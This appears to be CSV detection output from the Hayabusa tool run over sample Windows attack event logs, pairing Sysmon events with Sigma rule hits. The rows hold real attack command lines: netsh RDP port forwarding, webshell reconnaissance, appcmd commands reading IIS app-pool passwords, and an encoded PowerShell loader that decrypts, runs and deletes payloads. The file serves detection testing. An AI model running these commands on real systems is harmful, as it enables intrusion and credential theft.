+09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat : Path: \\vboxsrv\HTools\msxsl.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx -2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx -2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx -2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 : Path: C:\Windows\System32\netsh.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user : Path: C:\Windows\System32\cmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net user : Path: C:\Windows\System32\net.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1 user : Path: C:\Windows\System32\net1.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: net user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:56.727 
+09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making 
Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( 
message:Configuration error "" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.121 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: 
C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgAC
QAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.202 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAb